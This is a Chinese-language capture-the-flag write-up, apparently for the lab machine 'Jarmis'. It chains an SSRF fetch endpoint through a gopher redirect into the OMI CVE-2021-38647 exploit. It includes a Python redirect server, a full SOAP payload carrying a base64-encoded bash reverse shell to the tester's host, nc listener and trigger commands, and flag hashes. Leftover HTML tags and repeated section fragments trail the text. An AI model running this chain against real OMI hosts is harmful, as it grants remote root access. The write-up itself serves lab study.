Jarmis API漏洞利用与OMI权限提升技术分析<\/h1>

1. 目标信息收集<\/h2>

1.1 初始扫描<\/h3>
目标IP: 10.10.11.117<\/code><\/p>
开放端口:<\/p>

22\/tcp: OpenSSH 8.2p1 Ubuntu 4ubuntu0.3<\/li>
80\/tcp: nginx 1.18.0 (Ubuntu)<\/li>
<\/ul>
扫描命令:<\/p>
ip=<\/span>'10.10.11.117'<\/span>; itf=<\/span>'tun0'<\/span>
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span>
<\/span><\/span>  echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>
<\/span><\/span>  ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>
<\/span><\/span>  if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span>
<\/span><\/span>    echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>
<\/span><\/span>    nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>
<\/span><\/span>  else<\/span>
<\/span><\/span>    echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>
<\/span><\/span>  fi<\/span>
<\/span><\/span>else<\/span>
<\/span><\/span>  echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>1.2 Web应用发现<\/h3>
添加hosts记录:<\/p>
echo '10.10.11.117 jarmis.htb'<\/span> >> \/etc\/hosts
<\/span><\/span><\/code><\/pre>目录扫描:<\/p>
feroxbuster -u 'http:\/\/jarmis.htb'<\/span>
<\/span><\/span><\/code><\/pre>发现API文档:<\/p>
http:\/\/jarmis.htb\/docs
<\/code><\/pre>
2. Jarmis API漏洞分析<\/h2>
2.1 API端点发现<\/h3>
发现一个SSRF漏洞端点:<\/p>
http:\/\/jarmis.htb\/api\/v1\/fetch?endpoint=10.10.16.33
<\/code><\/pre>
该API使用curl命令发送请求，且curl版本<=7.80.0，存在Gopher协议SSRF漏洞。<\/p>
2.2 端口枚举<\/h3>
使用wfuzz枚举本地开放端口:<\/p>
wfuzz -z range,1-65535 -u http:\/\/jarmis.htb\/api\/v1\/fetch?endpoint=<\/span>localhost:FUZZ --hs "null"<\/span>
<\/span><\/span><\/code><\/pre>发现5985端口开放，可能存在OMI服务。<\/p>
3. OMI漏洞利用(CVE-2021-38647)<\/h2>
3.1 OMI简介<\/h3>
OMI (Open Management Infrastructure)是一个跨平台的开源管理框架，用于提供远程管理、监控和配置功能。<\/p>
3.2 漏洞利用准备<\/h3>

创建SSL证书:<\/li>
<\/ol>
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365<\/span> -nodes
<\/span><\/span><\/code><\/pre>
创建中转服务器(server.py):<\/li>
<\/ol>
from<\/span> http.server import<\/span> HTTPServer, BaseHTTPRequestHandler
<\/span><\/span>import<\/span> ssl
<\/span><\/span>
<\/span><\/span>class<\/span> MainHandler<\/span>(BaseHTTPRequestHandler):
<\/span><\/span>    def<\/span> do_GET<\/span>(self):
<\/span><\/span>        print("GET"<\/span>)
<\/span><\/span>        self.<\/span>send_response(301<\/span>)
<\/span><\/span>        self.<\/span>send_header("Location"<\/span>, 'http:\/\/10.10.16.33:9999\/SSRF'<\/span>)
<\/span><\/span>        self.<\/span>end_headers()
<\/span><\/span>
<\/span><\/span>httpd =<\/span> HTTPServer(('0.0.0.0'<\/span>, 8443<\/span>), MainHandler)
<\/span><\/span>httpd.<\/span>socket =<\/span> ssl.<\/span>wrap_socket(httpd.<\/span>socket, keyfile=<\/span>"key.pem"<\/span>, certfile=<\/span>"cert.pem"<\/span>, server_side=<\/span>True<\/span>)
<\/span><\/span>httpd.<\/span>serve_forever()
<\/span><\/span><\/code><\/pre>3.3 手动利用<\/h3>

构造恶意SOAP请求:<\/li>
<\/ol>
POST \/wsman HTTP\/1.1
<\/span><\/span>Host: 127.0.0.1:5985
<\/span><\/span>User-Agent: python-requests\/2.28.2
<\/span><\/span>Accept-Encoding: gzip, deflate
<\/span><\/span>Accept: *\/*
<\/span><\/span>Connection: close
<\/span><\/span>Content-Type: application\/soap+xml;charset=UTF-8
<\/span><\/span>Content-Length: 1728
<\/span><\/span>
<\/span><\/span><s:Envelope<\/span> xmlns:s=<\/span>"http:\/\/www.w3.org\/2003\/05\/soap-envelope"<\/span> xmlns:a=<\/span>"http:\/\/schemas.xmlsoap.org\/ws\/2004\/08\/addressing"<\/span> xmlns:h=<\/span>"http:\/\/schemas.microsoft.com\/wbem\/wsman\/1\/windows\/shell"<\/span> xmlns:n=<\/span>"http:\/\/schemas.xmlsoap.org\/ws\/2004\/09\/enumeration"<\/span> xmlns:p=<\/span>"http:\/\/schemas.microsoft.com\/wbem\/wsman\/1\/wsman.xsd"<\/span> xmlns:w=<\/span>"http:\/\/schemas.dmtf.org\/wbem\/wsman\/1\/wsman.xsd"<\/span> xmlns:xsi=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema"<\/span>><\/span>
<\/span><\/span>    <s:Header><\/span>
<\/span><\/span>        <a:To><\/span>HTTP:\/\/192.168.1.1:5985\/wsman\/<\/a:To><\/span>
<\/span><\/span>        <w:ResourceURI<\/span> s:mustUnderstand=<\/span>"true"<\/span>><\/span>http:\/\/schemas.dmtf.org\/wbem\/wscim\/1\/cim-schema\/2\/SCX_OperatingSystem<\/w:ResourceURI><\/span>
<\/span><\/span>        <a:ReplyTo><\/span>
<\/span><\/span>            <a:Address<\/span> s:mustUnderstand=<\/span>"true"<\/span>><\/span>http:\/\/schemas.xmlsoap.org\/ws\/2004\/08\/addressing\/role\/anonymous<\/a:Address><\/span>
<\/span><\/span>        <\/a:ReplyTo><\/span>
<\/span><\/span>        <a:Action><\/span>http:\/\/schemas.dmtf.org\/wbem\/wscim\/1\/cim-schema\/2\/SCX_OperatingSystem\/ExecuteShellCommand<\/a:Action><\/span>
<\/span><\/span>        <w:MaxEnvelopeSize<\/span> s:mustUnderstand=<\/span>"true"<\/span>><\/span>102400<\/w:MaxEnvelopeSize><\/span>
<\/span><\/span>        <a:MessageID><\/span>uuid:0AB58087-C2C3-0005-0000-000000010000<\/a:MessageID><\/span>
<\/span><\/span>        <w:OperationTimeout><\/span>PT1M30S<\/w:OperationTimeout><\/span>
<\/span><\/span>        <w:Locale<\/span> xml:lang=<\/span>"en-us"<\/span> s:mustUnderstand=<\/span>"false"<\/span> \/><\/span>
<\/span><\/span>        <p:DataLocale<\/span> xml:lang=<\/span>"en-us"<\/span> s:mustUnderstand=<\/span>"false"<\/span> \/><\/span>
<\/span><\/span>        <w:OptionSet<\/span> s:mustUnderstand=<\/span>"true"<\/span> \/><\/span>
<\/span><\/span>        <w:SelectorSet><\/span>
<\/span><\/span>            <w:Selector<\/span> Name=<\/span>"__cimnamespace"<\/span>><\/span>root\/scx<\/w:Selector><\/span>
<\/span><\/span>        <\/w:SelectorSet><\/span>
<\/span><\/span>    <\/s:Header><\/span>
<\/span><\/span>    <s:Body><\/span>
<\/span><\/span>        <p:ExecuteShellCommand_INPUT<\/span> xmlns:p=<\/span>"http:\/\/schemas.dmtf.org\/wbem\/wscim\/1\/cim-schema\/2\/SCX_OperatingSystem"<\/span>><\/span>
<\/span><\/span>            <p:command><\/span>echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zMy80NDMgMD4mMQo= | base64 -d | bash<\/p:command><\/span>
<\/span><\/span>            <p:timeout><\/span>0<\/p:timeout><\/span>
<\/span><\/span>        <\/p:ExecuteShellCommand_INPUT><\/span>
<\/span><\/span>    <\/s:Body><\/span>
<\/span><\/span><\/s:Envelope><\/span>
<\/span><\/span><\/code><\/pre>
将请求转换为Gopher格式:<\/li>
<\/ol>
gopher:\/\/127.0.0.1:5985\/_POST%20%2F%20HTTP%2F1.1%0D%0AHost%3A%20localhost%3A5985%0D%0AUser-Agent%3A%20curl%2F7.74.0%0D%0AContent-Length%3A%201782%0D%0AContent-Type%3A%20application%2Fsoap%2Bxml%3Bcharset%3DUTF-8%0D%0A%0D%0A%3Cs%3AEnvelope%20xmlns%3As%3D%22http%3A%2F%2Fwww.w3.org%2F2003%2F05%2Fsoap-envelope%22%20xmlns%3Aa%3D%22http%3A%2F%2Fschemas.xmlsoap.org%2Fws%2F2004%2F08%2Faddressing%22%20xmlns%3Ah%3D%22http%3A%2F%2Fschemas.microsoft.com%2Fwbem%2Fwsman%2F1%2Fwindows%2Fshell%22%20xmlns%3An%3D%22http%3A%2F%2Fschemas.xmlsoap.org%2Fws%2F2004%2F09%2Fenumeration%22%20xmlns%3Ap%3D%22http%3A%2F%2Fschemas.microsoft.com%2Fwbem%2Fwsman%2F1%2Fwsman.xsd%22%20xmlns%3Aw%3D%22http%3A%2F%2Fschemas.dmtf.org%2Fwbem%2Fwsman%2F1%2Fwsman.xsd%22%20xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema%22%3E%0A%20%20%20%20%3Cs%3AHeader%3E%0A%20%20%20%20%20%20%20%20%3Ca%3ATo%3EHTTP%3A%2F%2F192.168.1.1%3A5986%2Fwsman%2F%3C%2Fa%3ATo%3E%0A%20%20%20%20%20%20%20%20%3Cw%3AResourceURI%20s%3AmustUnderstand%3D%22true%22%3Ehttp%3A%2F%2Fschemas.dmtf.org%2Fwbem%2Fwscim%2F1%2Fcim-schema%2F2%2FSCX_OperatingSystem%3C%2Fw%3AResourceURI%3E%0A%20%20%20%20%20%20%20%20%3Ca%3AReplyTo%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Ca%3AAddress%20s%3AmustUnderstand%3D%22true%22%3Ehttp%3A%2F%2Fschemas.xmlsoap.org%2Fws%2F2004%2F08%2Faddressing%2Frole%2Fanonymous%3C%2Fa%3AAddress%3E%0A%20%20%20%20%20%20%20%20%3C%2Fa%3AReplyTo%3E%0A%20%20%20%20%20%20%20%20%3Ca%3AAction%3Ehttp%3A%2F%2Fschemas.dmtf.org%2Fwbem%2Fwscim%2F1%2Fcim-schema%2F2%2FSCX_OperatingSystem%2FExecuteShellCommand%3C%2Fa%3AAction%3E%0A%20%20%20%20%20%20%20%20%3Cw%3AMaxEnvelopeSize%20s%3AmustUnderstand%3D%22true%22%3E102400%3C%2Fw%3AMaxEnvelopeSize%3E%0A%20%20%20%20%20%20%20%20%3Ca%3AMessageID%3Euuid%3A0AB58087-C2C3-0005-0000-000000010000%3C%2Fa%3AMessageID%3E%0A%20%20%20%20%20%20%20%20%3Cw%3AOperationTimeout%3EPT1M30S%3C%2Fw%3AOperationTimeout%3E%0A%20%20%20%20%20%20%20%20%3Cw%3ALocale%20xml%3Alang%3D%22en-us%22%20s%3AmustUnderstand%3D%22false%22%20%2F%3E%0A%20%20%20%20%20%20%20%20%3Cp%3ADataLocale%20xml%3Alang%3D%22en-us%22%20s%3AmustUnderstand%3D%22false%22%20%2F%3E%0A%20%20%20%20%20%20%20%20%3Cw%3AOptionSet%20s%3AmustUnderstand%3D%22true%22%20%2F%3E%0A%20%20%20%20%20%20%20%20%3Cw%3ASelectorSet%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cw%3ASelector%20Name%3D%22__cimnamespace%22%3Eroot%2Fscx%3C%2Fw%3ASelector%3E%0A%20%20%20%20%20%20%20%20%3C%2Fw%3ASelectorSet%3E%0A%20%20%20%20%3C%2Fs%3AHeader%3E%0A%20%20%20%20%3Cs%3ABody%3E%0A%20%20%20%20%20%20%20%20%3Cp%3AExecuteShellCommand_INPUT%20xmlns%3Ap%3D%22http%3A%2F%2Fschemas.dmtf.org%2Fwbem%2Fwscim%2F1%2Fcim-schema%2F2%2FSCX_OperatingSystem%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cp%3Acommand%3Eecho%20-n%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNi4zMy80NDMgMD4mMQ%3D%3D%20%7C%20base64%20-d%20%7C%20bash%3C%2Fp%3Acommand%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3Cp%3Atimeout%3E0%3C%2Fp%3Atimeout%3E%0A%20%20%20%20%20%20%20%20%3C%2Fp%3AExecuteShellCommand_INPUT%3E%0A%20%20%20%20%3C%2Fs%3ABody%3E%0A%20%20%20%20%3C%2Fs%3AEnvelope%3E%0A%20%20%20%20
<\/code><\/pre>

创建利用脚本(exp.py):<\/li>
<\/ol>
from<\/span> http.server import<\/span> HTTPServer, BaseHTTPRequestHandler
<\/span><\/span>import<\/span> ssl
<\/span><\/span>
<\/span><\/span>payload =<\/span> 'gopher:\/\/127.0.0.1:5985\/_POST<\/span>%20%<\/span>2F%20HTTP<\/span>%2F<\/span>1.1%0D%0AHost%3A<\/span>%20lo<\/span>calhost%3A5985%0D%0AUser-Agent%3A<\/span>%20c<\/span>url<\/span>%2F<\/span>7.74.0%0D%0AContent-Length%3A<\/span>%201782%<\/span>0D%0AContent-Type%3A<\/span>%20a<\/span>pplication<\/span>%2F<\/span>soap%2Bxml%3Bcharset%3DUTF-8%0D%0A%0D%0A%3Cs%3AEnvelope<\/span>%20x<\/span>mlns%3As%3D%22http%3A<\/span>%2F%2F<\/span>www.w3.org<\/span>%2F<\/span>2003<\/span>%2F<\/span>05<\/span>%2F<\/span>soap-envelope<\/span>%22%<\/span>20xmlns%3Aa%3D%22http%3A<\/span>%2F%2F<\/span>schemas.xmlsoap.org<\/span>%2F<\/span>ws<\/span>%2F<\/span>2004<\/span>%2F<\/span>08<\/span>%2F<\/span>addressing<\/span>%22%<\/span>20xmlns%3Ah%3D%22http%3A<\/span>%2F%2F<\/span>schemas.microsoft.com<\/span>%2F<\/span>wbem<\/span>%2F<\/span>wsman<\/span>%2F<\/span>1<\/span>%2F<\/span>windows<\/span>%2F<\/span>shell<\/span>%22%<\/span>20xmlns%3An%3D%22http%3A<\/span>%2F%2F<\/span>schemas.xmlsoap.org<\/span>%2F<\/span>ws<\/span>%2F<\/span>2004<\/span>%2F<\/span>09<\/span>%2F<\/span>enumeration<\/span>%22%<\/span>20xmlns%3Ap%3D%22http%3A<\/span>%2F%2F<\/span>schemas.microsoft.com<\/span>%2F<\/span>wbem<\/span>%2F<\/span>wsman<\/span>%2F<\/span>1<\/span>%2F<\/span>wsman.xsd<\/span>%22%<\/span>20xmlns%3Aw%3D%22http%3A<\/span>%2F%2F<\/span>schemas.dmtf.org<\/span>%2F<\/span>wbem<\/span>%2F<\/span>wsman<\/span>%2F<\/span>1<\/span>%2F<\/span>wsman.xsd<\/span>%22%<\/span>20xmlns%3Axsi%3D%22http%3A<\/span>%2F%2F<\/span>www.w3.org<\/span>%2F<\/span>2001<\/span>%2F<\/span>XMLSchema<\/span>%22%<\/span>3E%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cs%3AHeader<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Ca%3ATo<\/span>%3E<\/span>HTTP%3A<\/span>%2F%2F<\/span>192.168.1.1%3A5986<\/span>%2F<\/span>wsman<\/span>%2F<\/span>%3C<\/span>%2F<\/span>a%3ATo<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cw%3AResourceURI<\/span>%20s<\/span>%3AmustUnderstand%3D%22true<\/span>%22%<\/span>3Ehttp%3A<\/span>%2F%2F<\/span>schemas.dmtf.org<\/span>%2F<\/span>wbem<\/span>%2F<\/span>wscim<\/span>%2F<\/span>1<\/span>%2F<\/span>cim-schema<\/span>%2F<\/span>2<\/span>%2F<\/span>SCX_OperatingSystem%3C<\/span>%2F<\/span>w%3AResourceURI<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Ca%3AReplyTo<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Ca%3AAddress<\/span>%20s<\/span>%3AmustUnderstand%3D%22true<\/span>%22%<\/span>3Ehttp%3A<\/span>%2F%2F<\/span>schemas.xmlsoap.org<\/span>%2F<\/span>ws<\/span>%2F<\/span>2004<\/span>%2F<\/span>08<\/span>%2F<\/span>addressing<\/span>%2F<\/span>role<\/span>%2F<\/span>anonymous%3C<\/span>%2F<\/span>a%3AAddress<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3C<\/span>%2F<\/span>a%3AReplyTo<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Ca%3AAction<\/span>%3E<\/span>http%3A<\/span>%2F%2F<\/span>schemas.dmtf.org<\/span>%2F<\/span>wbem<\/span>%2F<\/span>wscim<\/span>%2F<\/span>1<\/span>%2F<\/span>cim-schema<\/span>%2F<\/span>2<\/span>%2F<\/span>SCX_OperatingSystem<\/span>%2F<\/span>ExecuteShellCommand%3C<\/span>%2F<\/span>a%3AAction<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cw%3AMaxEnvelopeSize<\/span>%20s<\/span>%3AmustUnderstand%3D%22true<\/span>%22%<\/span>3E102400%3C<\/span>%2F<\/span>w%3AMaxEnvelopeSize<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Ca%3AMessageID<\/span>%3E<\/span>uuid%3A0AB58087-C2C3-0005-0000-000000010000%3C<\/span>%2F<\/span>a%3AMessageID<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cw%3AOperationTimeout<\/span>%3E<\/span>PT1M30S%3C<\/span>%2F<\/span>w%3AOperationTimeout<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cw%3ALocale<\/span>%20x<\/span>ml%3Alang%3D<\/span>%22e<\/span>n-us<\/span>%22%<\/span>20s%3AmustUnderstand%3D<\/span>%22f<\/span>alse<\/span>%22%<\/span>20<\/span>%2F%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cp%3ADataLocale<\/span>%20x<\/span>ml%3Alang%3D<\/span>%22e<\/span>n-us<\/span>%22%<\/span>20s%3AmustUnderstand%3D<\/span>%22f<\/span>alse<\/span>%22%<\/span>20<\/span>%2F%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cw%3AOptionSet<\/span>%20s<\/span>%3AmustUnderstand%3D%22true<\/span>%22%<\/span>20<\/span>%2F%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cw%3ASelectorSet<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cw%3ASelector%20Name%3D%22__cimnamespace<\/span>%22%<\/span>3Eroot<\/span>%2F<\/span>scx%3C<\/span>%2F<\/span>w%3ASelector<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3C<\/span>%2F<\/span>w%3ASelectorSet<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3C<\/span>%2F<\/span>s%3AHeader<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cs%3ABody<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cp%3AExecuteShellCommand_INPUT<\/span>%20x<\/span>mlns%3Ap%3D%22http%3A<\/span>%2F%2F<\/span>schemas.dmtf.org<\/span>%2F<\/span>wbem<\/span>%2F<\/span>wscim<\/span>%2F<\/span>1<\/span>%2F<\/span>cim-schema<\/span>%2F<\/span>2<\/span>%2F<\/span>SCX_OperatingSystem<\/span>%22%<\/span>3E%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cp%3Acommand<\/span>%3E<\/span>echo%20-n%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNi4zMy80NDMgMD4mMQ%3D%3D<\/span>%20%<\/span>7C%20base64%20-d<\/span>%20%<\/span>7C%20bash%3C<\/span>%2F<\/span>p%3Acommand<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3Cp%3Atimeout<\/span>%3E<\/span>0%3C<\/span>%2F<\/span>p%3Atimeout<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3C<\/span>%2F<\/span>p%3AExecuteShellCommand_INPUT<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3C<\/span>%2F<\/span>s%3ABody<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20%3C<\/span>%2F<\/span>s%3AEnvelope<\/span>%3E<\/span>%0A<\/span>%20%<\/span>20<\/span>%20%<\/span>20'<\/span>
<\/span><\/span>
<\/span><\/span>class<\/span> MainHandler<\/span>(BaseHTTPRequestHandler):
<\/span><\/span>    def<\/span> do_GET<\/span>(self):
<\/span><\/span>        print("GET"<\/span>)
<\/span><\/span>        self.<\/span>send_response(301<\/span>)
<\/span><\/span>        self.<\/span>send_header("Location"<\/span>, payload)
<\/span><\/span>        self.<\/span>end_headers()
<\/span><\/span>
<\/span><\/span>httpd =<\/span> HTTPServer(('0.0.0.0'<\/span>, 8443<\/span>), MainHandler)
<\/span><\/span>httpd.<\/span>socket =<\/span> ssl.<\/span>wrap_socket(httpd.<\/span>socket, keyfile=<\/span>"key.pem"<\/span>, certfile=<\/span>"cert.pem"<\/span>, server_side=<\/span>True<\/span>)
<\/span><\/span>httpd.<\/span>serve_forever()
<\/span><\/span><\/code><\/pre>
启动监听:<\/li>
<\/ol>
sudo nc -lvnp 443<\/span>
<\/span><\/span><\/code><\/pre>
触发漏洞:<\/li>
<\/ol>
curl -s -X 'GET'<\/span> 'http:\/\/jarmis.htb\/api\/v1\/fetch?endpoint=https:\/\/10.10.16.33:8443'<\/span> -H 'accept: application\/json'<\/span>
<\/span><\/span><\/code><\/pre>3.4 自动化利用工具<\/h3>
使用jarmis-omi工具:<\/p>
python3 jarmis-omi.py -rhost 10.10.16.33 -rport 443<\/span> -lport 9999<\/span> -i tun0
<\/span><\/span><\/code><\/pre>触发:<\/p>
curl -s -X 'GET'<\/span> 'http:\/\/jarmis.htb\/api\/v1\/fetch?endpoint=https:\/\/10.10.16.33:9999'<\/span> -H 'accept: application\/json'<\/span> | jq
<\/span><\/span><\/code><\/pre>4. 获取flag<\/h2>
成功获取:<\/p>

User.txt: aa8694e10a55e26f5ab4f3b29d800e9d<\/code><\/li>
Root.txt: 59aac095dbbf9e858e2202711be1bf2a<\/code><\/li>
<\/ul>
5. 参考资源<\/h2>

OMI漏洞利用工具: https:\/\/github.com\/horizon3ai\/CVE-2021-38647<\/li>
Jarmis自动化利用工具: https:\/\/github.com\/MartinxMax\/jarmis-omi<\/li>
<\/ol>
Jarmis API漏洞利用与OMI权限提升技术分析<\/h1>

1. 目标信息收集<\/h2>

2. Jarmis API漏洞分析<\/h2>

3. OMI漏洞利用(CVE-2021-38647)<\/h2>

3.1 OMI简介<\/h3> OMI (Open Management Infrastructure)是一个跨平台的开源管理框架，用于提供远程管理、监控和配置功能。<\/p>

5. 参考资源<\/h2> OMI漏洞利用工具: https:\/\/github.com\/horizon3ai\/CVE-2021-38647<\/li> Jarmis自动化利用工具: https:\/\/github.com\/MartinxMax\/jarmis-omi<\/li> <\/ol>

3.1 OMI简介<\/h3>
OMI (Open Management Infrastructure)是一个跨平台的开源管理框架，用于提供远程管理、监控和配置功能。<\/p>

5. 参考资源<\/h2>

OMI漏洞利用工具: https:\/\/github.com\/horizon3ai\/CVE-2021-38647<\/li>
Jarmis自动化利用工具: https:\/\/github.com\/MartinxMax\/jarmis-omi<\/li> <\/ol>
